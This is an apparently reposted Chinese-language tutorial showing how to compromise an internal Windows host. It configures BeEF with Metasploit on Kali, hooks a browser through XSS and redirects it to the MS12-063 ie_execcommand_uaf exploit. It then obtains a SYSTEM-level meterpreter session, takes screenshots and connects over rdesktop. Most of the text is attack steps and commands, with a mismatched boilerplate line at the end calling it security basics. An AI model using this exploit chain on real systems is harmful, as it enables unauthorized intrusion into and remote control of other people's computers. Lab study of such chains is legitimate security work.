明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

metasploit使用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)

[摘要]系統(tǒng):KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcom...

系統(tǒng):KALI

用到的工具:beEF+msf

利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf

先配置下:

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit :false改成true

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)1

再進(jìn)入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)2

再改動(dòng)下custom path:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)3

這樣beef已經(jīng)配置好了。那就運(yùn)行下metasploit

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)4

運(yùn)行msf后 數(shù)據(jù)庫(kù)連接下,不然上線也會(huì)沒(méi)有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)5

這樣就沒(méi)有什么問(wèn)題。我們可以先看一下beef.數(shù)據(jù)庫(kù)只要連上了就不會(huì)出現(xiàn)msf的api錯(cuò)誤的。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)6

進(jìn)入beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)7

賬號(hào)密碼beef 配置文件里面有。beef:beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)8

那beef已經(jīng)都OK了。
現(xiàn)在來(lái)搞下選擇下要顯示的頁(yè)面:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)9

hook.js 運(yùn)行beef 顯示出來(lái)的。
別忘記運(yùn)行下apache。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)10

我們?cè)龠M(jìn)入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來(lái)選擇。

show options
port可以自已改。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)11

我用xp+ie7

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)12

直接訪問(wèn)下我們的頁(yè)面192.168.220.128/xss/
beef就會(huì)顯示出來(lái)了。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)13

點(diǎn)擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)14

我們就會(huì)看到msf上面已經(jīng)顯示出來(lái)了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)15

執(zhí)行sessions -i

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)16

執(zhí)行sessions -i ID號(hào)
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)17

執(zhí)行下screenshost

meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當(dāng)前主機(jī)的屏幕內(nèi)容。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)18

也可以rdesktop 遠(yuǎn)程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機(jī)。

注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。